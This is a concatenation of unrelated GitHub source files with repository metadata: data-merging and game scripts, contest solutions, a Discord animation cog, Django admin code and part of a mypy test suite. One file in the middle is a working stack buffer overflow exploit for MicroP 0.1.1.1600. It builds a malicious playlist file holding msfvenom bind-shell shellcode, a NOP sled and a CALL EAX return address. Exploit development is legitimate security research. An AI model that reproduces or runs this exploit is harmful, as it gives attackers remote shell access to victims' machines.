63eb70fb3cfef92dc7a6799ef66587b91f5e6b14 | 2f380e7ebe2e0b05c1c487949f999b4d138702bb | /recurse_limit/merge_sd_preds.py | e680ed265ac489e52246fdc31a06a690029479d9 | [] | no_license | fdamani/mol-edit | 9ab09b63957d1aaa0ad31302bc7ebb21f72dafe3 | ec40f15d6092dd6c46f42f4099635e8d5682ab10 | refs/heads/master | 2021-02-16T19:44:15.475348 | 2020-03-05T20:52:01 | 2020-03-05T20:52:01 | 245,039,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | import numpy as np
import pandas as pd
import sys
from IPython import embed
import os
input_dir1 = sys.argv[1]
input_dir2 = sys.argv[2]
input_dir3 = sys.argv[3]
#input_dir4 = sys.argv[4]
output_dir = sys.argv[4]
combined_dat = []
dirs = [input_dir1, input_dir2, input_dir3]#, input_dir4]
for dr in dirs:
for file in os.listdir(dr):
try:
combined_dat.append(pd.read_csv(dr+'/'+file, header=None, skip_blank_lines=False))
except:
print('error')
continue
combined_dat = pd.concat(combined_dat,axis=1).stack(dropna=False)
combined_dat.to_csv(output_dir+'/stochastic_decoding_qed.csv',header=None,index=None) | [
"[email protected]"
] | |
701aefc8f95457861896fba7777ce18a28630e0f | a6a08c80ee1ada28bc6ad0371065ce7c13c9331b | /player.py | 282ae5da659b1ba24aa54d6f67eed4af6ee153e5 | [] | no_license | khatangatao/networkTutorial1 | 3a2a9658c1b3cafb3755384c4bb866ec2de69f2f | e77f0248d6c4e97a1cd52ec215a7b85fe3de50fe | refs/heads/master | 2020-05-15T11:44:49.311028 | 2019-08-28T08:06:18 | 2019-08-28T08:06:18 | 182,242,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | import pygame
class Player():
def __init__(self, x, y, width, height, color):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.rect = (x, y, width, height)
self.vel = 3
def draw(self, win):
"""draw rectange to the screen"""
pygame.draw.rect(win, self.color, self.rect)
def move(self):
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.x -= self.vel
if keys[pygame.K_RIGHT]:
self.x += self.vel
if keys[pygame.K_UP]:
self.y -= self.vel
if keys[pygame.K_DOWN]:
self.y += self.vel
self.update()
def update(self):
self.rect = (self.x, self.y, self.width, self.height)
| [
"[email protected]"
] | |
3b151832899d2bcaf4adc33fa0a46a3e5f0486db | d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4 | /AtCoder/ARC105/probD.py | 8f5eb20fda413d72ad9dd38d8820d4c345789e27 | [] | no_license | wattaihei/ProgrammingContest | 0d34f42f60fa6693e04c933c978527ffaddceda7 | c26de8d42790651aaee56df0956e0b206d1cceb4 | refs/heads/master | 2023-04-22T19:43:43.394907 | 2021-05-02T13:05:21 | 2021-05-02T13:05:21 | 264,400,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | import sys
input = sys.stdin.buffer.readline
from collections import Counter
def canWiFirst(N, A):
if N%2 == 1:
return False
C = Counter(A)
for c in C.values():
if c%2 != 0:
return True
return False
Q = int(input())
for _ in range(Q):
N = int(input())
A = list(map(int, input().split()))
print("First" if canWiFirst(N, A) else "Second") | [
"[email protected]"
] | |
f0cf8fc30761652463b3ecce7ac92d9b03320a58 | bffaba2184f883876a41a13d17625df951b3c37a | /windows/x86/local/microp_0.1.1.1600/microp_0.1.1.1600.py | cb387a21f58cf3ff5777730beb3a0f4f59dfb6c3 | [] | no_license | VoidSec/Exploit-Development | 5d99e2c784f5d12b4020aea23cda7de33bd51486 | d75e6b336f2239b85fb2da7a537ffc0647ef497d | refs/heads/master | 2023-06-23T16:26:33.337107 | 2023-06-22T20:49:44 | 2023-06-22T20:49:44 | 180,751,769 | 165 | 38 | null | 2022-05-23T18:15:24 | 2019-04-11T08:47:31 | Python | UTF-8 | Python | false | false | 2,308 | py | """
Full title: MicroP 0.1.1.1600 Local Stack Buffer Overflow
Exploit Author: Paolo Stagno - [email protected] - https://voidsec.com
Vendor Homepage: http://sourceforge.net/projects/microp/
Version: MicroP 0.1.1.1600
Tested on: Windows XP SP3
Category: local exploit
Platform: windows
"""
#!/usr/bin/python
# EAX is pointing to buffer instead of ESP
# Follow EAX in dump, go to location MEM addr + A (junk) offset (in hex)
# see where the pattern is corrupted
file=open("exploit.mppl","wb")
#badchar \x00\x0a\x0d
#msfvenom -p windows/shell_bind_tcp -f c -a x86 -b "\x00\x0a\x0d"
shellcode=("\xdb\xc4\xba\x79\x94\x98\xcc\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x53\x31\x56\x17\x83\xc6\x04\x03\x2f\x87\x7a\x39\x33\x4f\xf8"
"\xc2\xcb\x90\x9d\x4b\x2e\xa1\x9d\x28\x3b\x92\x2d\x3a\x69\x1f"
"\xc5\x6e\x99\x94\xab\xa6\xae\x1d\x01\x91\x81\x9e\x3a\xe1\x80"
"\x1c\x41\x36\x62\x1c\x8a\x4b\x63\x59\xf7\xa6\x31\x32\x73\x14"
"\xa5\x37\xc9\xa5\x4e\x0b\xdf\xad\xb3\xdc\xde\x9c\x62\x56\xb9"
"\x3e\x85\xbb\xb1\x76\x9d\xd8\xfc\xc1\x16\x2a\x8a\xd3\xfe\x62"
"\x73\x7f\x3f\x4b\x86\x81\x78\x6c\x79\xf4\x70\x8e\x04\x0f\x47"
"\xec\xd2\x9a\x53\x56\x90\x3d\xbf\x66\x75\xdb\x34\x64\x32\xaf"
"\x12\x69\xc5\x7c\x29\x95\x4e\x83\xfd\x1f\x14\xa0\xd9\x44\xce"
"\xc9\x78\x21\xa1\xf6\x9a\x8a\x1e\x53\xd1\x27\x4a\xee\xb8\x2f"
"\xbf\xc3\x42\xb0\xd7\x54\x31\x82\x78\xcf\xdd\xae\xf1\xc9\x1a"
"\xd0\x2b\xad\xb4\x2f\xd4\xce\x9d\xeb\x80\x9e\xb5\xda\xa8\x74"
"\x45\xe2\x7c\xe0\x4d\x45\x2f\x17\xb0\x35\x9f\x97\x1a\xde\xf5"
"\x17\x45\xfe\xf5\xfd\xee\x97\x0b\xfe\x01\x34\x85\x18\x4b\xd4"
"\xc3\xb3\xe3\x16\x30\x0c\x94\x69\x12\x24\x32\x21\x74\xf3\x3d"
"\xb2\x52\x53\xa9\x39\xb1\x67\xc8\x3d\x9c\xcf\x9d\xaa\x6a\x9e"
"\xec\x4b\x6a\x8b\x86\xe8\xf9\x50\x56\x66\xe2\xce\x01\x2f\xd4"
"\x06\xc7\xdd\x4f\xb1\xf5\x1f\x09\xfa\xbd\xfb\xea\x05\x3c\x89"
"\x57\x22\x2e\x57\x57\x6e\x1a\x07\x0e\x38\xf4\xe1\xf8\x8a\xae"
"\xbb\x57\x45\x26\x3d\x94\x56\x30\x42\xf1\x20\xdc\xf3\xac\x74"
"\xe3\x3c\x39\x71\x9c\x20\xd9\x7e\x77\xe1\xe9\x34\xd5\x40\x62"
"\x91\x8c\xd0\xef\x22\x7b\x16\x16\xa1\x89\xe7\xed\xb9\xf8\xe2"
"\xaa\x7d\x11\x9f\xa3\xeb\x15\x0c\xc3\x39")
#|NOP sled|shellcode|NOP padding|CALL EAX
buffer="\x90"*24
buffer+=shellcode
buffer+="\x90"*(1276-len(buffer))
buffer+="\x4D\xDB\x42\x00"# we should call eax/jmp eax instead of esp 0042DB4D
file.write(buffer)
file.close() | [
"[email protected]"
] | |
a9aae50245008966f6aaa8ec8c393a6dbb8e88e1 | 127fa3dd454434b4c7526afe161177af2e10226e | /leetcode/20. Valid Parentheses.py | f68d5676ff6db745443ab6507617aa5be571ebf7 | [] | no_license | lunar-r/sword-to-offer-python | 966c46a8ddcff8ce5c95697638c988d83da3beab | fab4c341486e872fb2926d1b6d50499d55e76a4a | refs/heads/master | 2023-04-18T18:57:12.126441 | 2020-11-29T09:51:23 | 2020-11-29T09:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | # -*- coding: utf-8 -*-
"""
File Name: 20. Valid Parentheses
Description :
Author : simon
date: 19-3-23
"""
"""
思路: 不断从中间删除'()', '[]', '{}' 直到最后变成空字符串
"""
class Solution(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
if not s:
return True
if len(s)%2:
return False
s = list(s)
for _ in range(len(s)//2):
i = 0
while i < len(s):
if i+1 < len(s) and s[i] + s[i+1] in ['()', '[]', '{}']:
s.remove(s[i])
s.remove(s[i])
else:
i += 1
return s == []
"""
官方解
从左往右扫描符号
遇到左半部分括号压入堆栈
遇到有半部分的时候就弹出堆栈的元素
二者需要配对
从左往右观察合法的括号的时候可以发现后出现的左括号会先得到右括号的匹配
这就是先入后出 后入先出的特性
可以联想到使用堆栈
"""
class Solution_(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
left = []
right2left = { ")": "(",
"}": "{",
"]": "["}
for char in s:
if char in right2left: # 遇到了右半部分 弹出堆栈元素 判断是否匹配
top_element = left.pop() if left else '#'
if right2left[char] != top_element:
return False
else: # 遇到左半部分 压入堆栈等待匹配
left.append(char)
return not left
test = '({[[]]})'
solu = Solution()
print(solu.isValid(test)) | [
"[email protected]"
] | |
85a88417b4dc336d32fb32864d4d54540c01bd63 | b956e5f659f5045489a87fee8f1d6db778ac3d87 | /riskGame/classes/agent/agent.py | f97b5c67514ca8000a65a2e77c90c240032a4004 | [
"MIT"
] | permissive | AmrHendy/risk-game | 5599864444cc1feda706f20988d744acd9222184 | c7f9ac86de6118e6522ae3c60b36b914fafad946 | refs/heads/master | 2020-04-11T12:28:29.581768 | 2019-01-04T23:48:11 | 2019-01-04T23:48:11 | 161,781,452 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | from riskGame.classes.state.move import Move
from copy import deepcopy
class Agent:
def __init__(self, place_bonus_heuristic, move_heuristic, attack_heuristic):
self._place_bonus_heuristic = place_bonus_heuristic
self._move_heuristic = move_heuristic
self._attack_heuristic = attack_heuristic
# move is None in all agents unless in case of human it will be not None
def play(self, current_state, move=None):
if move:
state = current_state
else:
state = deepcopy(current_state)
if move is None:
move = Move()
if self._place_bonus_heuristic is not None:
move = self._place_bonus_heuristic.make_decision(state, move)
if self._move_heuristic is not None:
move = self._move_heuristic.make_decision(state, move)
if self._attack_heuristic is not None:
move = self._attack_heuristic.make_decision(state, move)
move.apply_move()
state.increase_turn()
state.increase_player_turn()
state.set_parent_state(current_state)
return state
| [
"[email protected]"
] | |
77da6860684dfce2ec7fcfdf14c2655de8344b36 | af4baf0c9daf95996334ea83b33d6a360eb352bc | /cogs/Anim.py | 9e0a0b4b4b61316e2e68915fe9522b1bc4e52a20 | [] | no_license | EC-discord/TestBotEC | f16af106846f1d510a5a927b4046432242645389 | 7b12ab2943899f28fb52b1923f1cd15a4f0c653e | refs/heads/master | 2021-06-04T04:33:33.187612 | 2020-06-13T16:27:34 | 2020-06-13T16:27:34 | 109,504,954 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import discord
import asyncio
from discord.ext import commands
class Anim(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def cathi(self, ctx):
msg = await ctx.send("""ຸ _____
/ / /|"
| ̄ ̄ ̄ ̄| |
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
await msg.edit(content="""ຸ Hi...♡
∧_∧__
/(´・ω・`) /\
/| ̄ ̄ ̄ ̄|\/
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
for i in range(1 ,6 , 1):
await msg.edit(content="""ຸ _____
/ / /|"
| ̄ ̄ ̄ ̄| |
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
await msg.edit(content="""ຸ Hi...♡
∧_∧__
/(´・ω・`) /\
/| ̄ ̄ ̄ ̄|\/
| |/
 ̄ ̄ ̄ ̄""")
await asyncio.sleep(1.3)
@commands.command()
async def catsu(self, ctx):
msg = await ctx.send("""{ | | }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
await msg.edit(content="""{ \ / }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
for i in range(1, 10, 1):
await msg.edit(content="""{ | | }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
await msg.edit(content="""{ \ / }
( ^ - ^ )
( u u )~""")
await asyncio.sleep(1)
@commands.command()
async def virus(self, ctx, member : discord.Member = None, *, virus : str = "trojan horse"):
wheelList = ['/', '-', '\\', '|']
wheelIter = iter(wheelList)
msg = await ctx.send('`Preparing virus`')
for i in range(2, 17, 2):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await msg.edit(content=f"`[{('▓' * i).ljust(16)}] {wheel} {virus}-virus.exe Packing files.`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus. |`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus.. /`")
await asyncio.sleep(1)
await msg.edit(content=f"`Injecting virus... -`")
await asyncio.sleep(1)
await msg.edit(content=f"`Successfully Injected {virus}-virus.exe into {member.name}`")
async def boom(self, ctx):
for c in range(5, -1, -1):
await message.edit(content=f"`THIS MESSAGE WILL SELF DESTRUCT IN {c}`")
await asyncio.sleep(1)
await message.edit(content="💣")
await asyncio.sleep(1)
await message.edit(content="💥")
@commands.command()
async def table(self, ctx):
m = await ctx.send(content="`(\°-°)\ ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(\°□°)\ ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(-°□°)- ┬─┬`")
await asyncio.sleep(1)
await m.edit(content="`(╯°□°)╯ ┬─┬`")
await asyncio.sleep(1)
wheelList = [']', '┻━┻', '[', '┬─┬']
wheelIter = iter(wheelList)
for i in range(7, 39, 4):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await m.edit(content=f"`(\°-°)\{(i * ' ')}{wheel}`")
await asyncio.sleep(1)
@commands.command()
async def warning(self, ctx):
msg = await ctx.send("`LOAD !! WARNING !! SYSTEM OVER`")
await asyncio.sleep(1)
await msg.edit(content="`OAD !! WARNING !! SYSTEM OVERL`")
await asyncio.sleep(1)
await msg.edit(content="`AD !! WARNING !! SYSTEM OVERLO`")
await asyncio.sleep(1)
await msg.edit(content="`D !! WARNING !! SYSTEM OVERLOA`")
await asyncio.sleep(1)
await msg.edit(content="`! WARNING !! SYSTEM OVERLOAD !`")
await asyncio.sleep(1)
await msg.edit(content="`WARNING !! SYSTEM OVERLOAD !!`")
await asyncio.sleep(1)
await msg.edit(content="`ARNING !! SYSTEM OVERLOAD !! W`")
await asyncio.sleep(1)
await msg.edit(content="`RNING !! SYSTEM OVERLOAD !! WA`")
await asyncio.sleep(1)
await msg.edit(content="`NING !! SYSTEM OVERLOAD !! WAR`")
await asyncio.sleep(1)
await msg.edit(content="`ING !! SYSTEM OVERLOAD !! WARN`")
await asyncio.sleep(1)
await msg.edit(content="`NG !! SYSTEM OVERLOAD !! WARNI`")
await asyncio.sleep(1)
await msg.edit(content="`G !! SYSTEM OVERLOAD !! WARNIN`")
await asyncio.sleep(1)
await msg.edit(content="`!! SYSTEM OVERLOAD !! WARNING`")
await asyncio.sleep(1)
await msg.edit(content="`! SYSTEM OVERLOAD !! WARNING !`")
await asyncio.sleep(1)
await msg.edit(content="`SYSTEM OVERLOAD !! WARNING !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.5 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`WARNING !! SYSTEM OVERLOAD !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.2 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`SYSTEM OVERLOAD !! WARNING !!`")
await asyncio.sleep(1)
await msg.edit(content="`IMMINENT SHUT-DOWN IN 0.01 SEC!`")
await asyncio.sleep(1)
await msg.edit(content="`SHUT-DOWN EXIT ERROR ¯\\(。・益・)/¯`")
await asyncio.sleep(1)
await msg.edit(content="`CTRL + R FOR MANUAL OVERRIDE..`")
@commands.command()
async def woah(self, ctx):
m = await ctx.send("( ' O ')")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="(' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ' )")
await asyncio.sleep(1)
await m.edit(content="( ' O ')")
@commands.command()
async def deadchat(self, ctx):
msg = await ctx.send('DEAD CHAT')
wheelList = ['T DEAD CHA', 'AT DEAD CH', 'HAT DEAD C', 'CHAT DEAD', 'D CHAT DEA', 'AD CHAT DE', 'EAD CHAT D', 'DEAD CHAT']
wheelIter = iter(wheelList)
for i in range(1, 10, 1):
try:
wheel = next(wheelIter)
except StopIteration:
wheelIter = iter(wheelList)
wheel = next(wheelIter)
await msg.edit(content=f"`{wheel}`")
await asyncio.sleep(1)
def setup(bot):
bot.add_cog(Anim(bot))
| [
"[email protected]"
] | |
c88d91a684760a70db45c13dfa401b805fb99304 | bef2720e24999b2a923fa27207afe16b3fc5e71f | /Labs2/Lab5.py | 9210f60e10722c4309ba4e7b198e8c4833731a7c | [] | no_license | justineyerly/it3038c-scripts | e28173f5cd25f89ec5c5fd7adea8a2fbba9c9312 | 82e781418cc017d092aac97ea5f631c03db9f05a | refs/heads/master | 2022-07-10T14:44:58.455083 | 2020-04-30T01:27:58 | 2020-04-30T01:27:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | import random
numberofGuesses = 0
number = random.randint(1,100)
print("Hello! What is your name?")
name = input()
print('Welcome, ' +name +"! You're going to play a number guessing game. You must guess a number between 1 and 100. Can you do it in what? 10 tries? Ready. Go!")
while numberofGuesses < 10:
print('Take a Guess!')
guess = input()
guess = int(guess)
numberofGuesses = numberofGuesses + 1
guessesLeft = 10 - numberofGuesses
if guess < number:
print("Your guess is too low. Please try again")
print("You also have %s guesses left, so guess wisely!" % guessesLeft)
if guess > number:
print("Your guess is too High. Please try again")
print("You also have %s guesses left, so guess wisely!" % guessesLeft)
if numberofGuesses == 0:
print("Sorry you ran out of tries! The number I was thinking of was %s . Try playing again!" % number)
if guess == number:
break
if guess == number:
print("Good Job, " +name +"! You guessed the number in %s tries!" % numberofGuesses)
if guess != number:
print("Sorry! The number I had in mind was %s . Try playing again!" % number) | [
"[email protected]"
] | |
3a65a7ae36bc8dee8927515ec8b2f97f90ff8da3 | 17c6673dfa35cdc053d51415ed565101d9c1f30e | /recipe_app/migrations/0001_initial.py | 3978b663233d60bab34db1bdc360ea917a4b3324 | [] | no_license | jodi08/recipe_box | a7a5a6ec4ee5926c729285a51b83bcaa63c15f3a | 562c847dd2bd8cf88bd2e0c7364a27224606db85 | refs/heads/dev | 2022-12-12T04:24:27.419874 | 2020-08-07T21:18:49 | 2020-08-07T21:18:49 | 285,696,017 | 0 | 1 | null | 2020-09-12T04:01:52 | 2020-08-07T00:02:16 | Python | UTF-8 | Python | false | false | 1,134 | py | # Generated by Django 3.1 on 2020-08-07 14:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80)),
('bio', models.TextField()),
],
),
migrations.CreateModel(
name='Recipes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('description', models.TextField()),
('time_required', models.CharField(max_length=25)),
('instructions', models.TextField()),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='recipe_app.author')),
],
),
]
| [
"[email protected]"
] | |
f30701bd492a4102d4f2a33e2bbda3effb1a234b | 5a64bd2d0fe5b9af737fe8844957e92ab7412bc1 | /accounts/admin.py | fc6c33c480fb72d31fff80537a09857c7b0e72a3 | [] | no_license | ishimwe-samuel/vmis_python | 5b19b3b2bfc881853d0a5aee0fd105664fb4e648 | 054584d199f4da3ca24bd6ca96ed52d68218b8fd | refs/heads/master | 2023-02-23T15:08:16.905002 | 2021-01-31T21:23:31 | 2021-01-31T21:23:31 | 334,760,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,576 | py | from django.contrib import admin
from .models import User
from .forms import UserAdminCreationForm, UserAdminChangeForm
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
class UserAdmin(BaseUserAdmin):
# The forms to add and change user instances
form = UserAdminChangeForm
add_form = UserAdminCreationForm
# The fields to be used in displaying the User model.
# These override the definitions on the base UserAdmin
# that reference specific fields on auth.User.
# list_display = ('email', 'is_admin')
list_display = ('email', 'username', 'orgunitname',
'orgunitlevel', 'parentorgunitname',)
list_filter = ('is_admin',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('username', 'surname', 'phone_number',
'orgunitid', 'orgunitname', 'orgunitlevel', 'parentorgunitid', 'parentorgunitname',)}),
('Permissions', {'fields': ('is_admin', 'is_active',)}),
)
# add_fieldsets is not a standard ModelAdmin attribute. UserAdmin
# overrides get_fieldsets to use this attribute when creating a user.
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'username', 'surname', 'phone_number', 'orgunitid', 'orgunitname', 'orgunitlevel', 'parentorgunitid', 'parentorgunitname', 'password1', 'password2')}
),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
admin.site.register(User, UserAdmin)
| [
"[email protected]"
] | |
a12b64c5884c334a29924be461c7346f4857dbbe | 251c70bd53ce6c499b011590c2f73632696d950f | /virtual/lib/python3.6/site-packages/mypy/test/teststubgen.py | 3566f03fb9a1497dc33226a715cc846110889d3f | [
"MIT"
] | permissive | EduardoPessanha/Git-Python | ef09e404641fb988817c995bdf607c1860bf0622 | 87aa10af09510469032732ed2c55d0d65eb4c1d6 | refs/heads/master | 2023-01-25T01:10:51.089507 | 2020-12-03T12:27:44 | 2020-12-03T12:27:44 | 296,760,423 | 0 | 0 | MIT | 2020-09-28T03:37:14 | 2020-09-19T01:04:33 | Python | UTF-8 | Python | false | false | 34,973 | py | import io
import os.path
import shutil
import sys
import tempfile
import re
import unittest
from types import ModuleType
from typing import Any, List, Tuple, Optional
from mypy.test.helpers import (
assert_equal, assert_string_arrays_equal, local_sys_path_set
)
from mypy.test.data import DataSuite, DataDrivenTestCase
from mypy.errors import CompileError
from mypy.stubgen import (
generate_stubs, parse_options, Options, collect_build_targets,
mypy_options, is_blacklisted_path, is_non_library_module
)
from mypy.stubutil import walk_packages, remove_misplaced_type_comments, common_dir_prefix
from mypy.stubgenc import (
generate_c_type_stub, infer_method_sig, generate_c_function_stub, generate_c_property_stub
)
from mypy.stubdoc import (
parse_signature, parse_all_signatures, build_signature, find_unique_signatures,
infer_sig_from_docstring, infer_prop_type_from_docstring, FunctionSig, ArgSig,
infer_arg_sig_from_anon_docstring, is_valid_type
)
from mypy.moduleinspect import ModuleInspect, InspectError
class StubgenCmdLineSuite(unittest.TestCase):
"""Test cases for processing command-line options and finding files."""
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_files_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
os.mkdir('subdir')
self.make_file('subdir', 'a.py')
self.make_file('subdir', 'b.py')
os.mkdir(os.path.join('subdir', 'pack'))
self.make_file('subdir', 'pack', '__init__.py')
opts = parse_options(['subdir'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {mod.path for mod in py_mods}
assert_equal(files, {os.path.join('subdir', 'pack', '__init__.py'),
os.path.join('subdir', 'a.py'),
os.path.join('subdir', 'b.py')})
finally:
os.chdir(current)
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_packages_found(self) -> None:
current = os.getcwd()
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
os.mkdir('pack')
self.make_file('pack', '__init__.py', content='from . import a, b')
self.make_file('pack', 'a.py')
self.make_file('pack', 'b.py')
opts = parse_options(['-p', 'pack'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert_equal(c_mods, [])
files = {os.path.relpath(mod.path or 'FAIL') for mod in py_mods}
assert_equal(files, {os.path.join('pack', '__init__.py'),
os.path.join('pack', 'a.py'),
os.path.join('pack', 'b.py')})
finally:
os.chdir(current)
@unittest.skipIf(sys.platform == 'win32', "clean up fails on Windows")
def test_module_not_found(self) -> None:
current = os.getcwd()
captured_output = io.StringIO()
sys.stdout = captured_output
with tempfile.TemporaryDirectory() as tmp:
try:
os.chdir(tmp)
self.make_file(tmp, 'mymodule.py', content='import a')
opts = parse_options(['-m', 'mymodule'])
py_mods, c_mods = collect_build_targets(opts, mypy_options(opts))
assert captured_output.getvalue() == ''
finally:
sys.stdout = sys.__stdout__
os.chdir(current)
def make_file(self, *path: str, content: str = '') -> None:
file = os.path.join(*path)
with open(file, 'w') as f:
f.write(content)
def run(self, result: Optional[Any] = None) -> Optional[Any]:
with local_sys_path_set():
return super().run(result)
class StubgenCliParseSuite(unittest.TestCase):
def test_walk_packages(self) -> None:
with ModuleInspect() as m:
assert_equal(
set(walk_packages(m, ["mypy.errors"])),
{"mypy.errors"})
assert_equal(
set(walk_packages(m, ["mypy.errors", "mypy.stubgen"])),
{"mypy.errors", "mypy.stubgen"})
all_mypy_packages = set(walk_packages(m, ["mypy"]))
self.assertTrue(all_mypy_packages.issuperset({
"mypy",
"mypy.errors",
"mypy.stubgen",
"mypy.test",
"mypy.test.helpers",
}))
class StubgenUtilSuite(unittest.TestCase):
"""Unit tests for stubgen utility functions."""
def test_parse_signature(self) -> None:
self.assert_parse_signature('func()', ('func', [], []))
def test_parse_signature_with_args(self) -> None:
self.assert_parse_signature('func(arg)', ('func', ['arg'], []))
self.assert_parse_signature('do(arg, arg2)', ('do', ['arg', 'arg2'], []))
def test_parse_signature_with_optional_args(self) -> None:
self.assert_parse_signature('func([arg])', ('func', [], ['arg']))
self.assert_parse_signature('func(arg[, arg2])', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func([arg[, arg2]])', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_default_arg(self) -> None:
self.assert_parse_signature('func(arg=None)', ('func', [], ['arg']))
self.assert_parse_signature('func(arg, arg2=None)', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func(arg=1, arg2="")', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_qualified_function(self) -> None:
self.assert_parse_signature('ClassName.func(arg)', ('func', ['arg'], []))
def test_parse_signature_with_kw_only_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *, arg2=1)',
('func', ['arg', '*'], ['arg2']))
def test_parse_signature_with_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *args)',
('func', ['arg', '*args'], []))
def test_parse_signature_with_star_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, **args)',
('func', ['arg', '**args'], []))
def assert_parse_signature(self, sig: str, result: Tuple[str, List[str], List[str]]) -> None:
assert_equal(parse_signature(sig), result)
def test_build_signature(self) -> None:
assert_equal(build_signature([], []), '()')
assert_equal(build_signature(['arg'], []), '(arg)')
assert_equal(build_signature(['arg', 'arg2'], []), '(arg, arg2)')
assert_equal(build_signature(['arg'], ['arg2']), '(arg, arg2=...)')
assert_equal(build_signature(['arg'], ['arg2', '**x']), '(arg, arg2=..., **x)')
def test_parse_all_signatures(self) -> None:
assert_equal(parse_all_signatures(['random text',
'.. function:: fn(arg',
'.. function:: fn()',
' .. method:: fn2(arg)']),
([('fn', '()'),
('fn2', '(arg)')], []))
def test_find_unique_signatures(self) -> None:
assert_equal(find_unique_signatures(
[('func', '()'),
('func', '()'),
('func2', '()'),
('func2', '(arg)'),
('func3', '(arg, arg2)')]),
[('func', '()'),
('func3', '(arg, arg2)')])
def test_infer_sig_from_docstring(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x) - y', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x')], ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=None)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=3)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=[1, 2, 3])', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nafunc(x) - y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x, y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x=z(y))', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc x', 'func'), [])
# Try to infer signature from type annotation.
assert_equal(infer_sig_from_docstring('\nfunc(x: int)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int \n', 'func'),
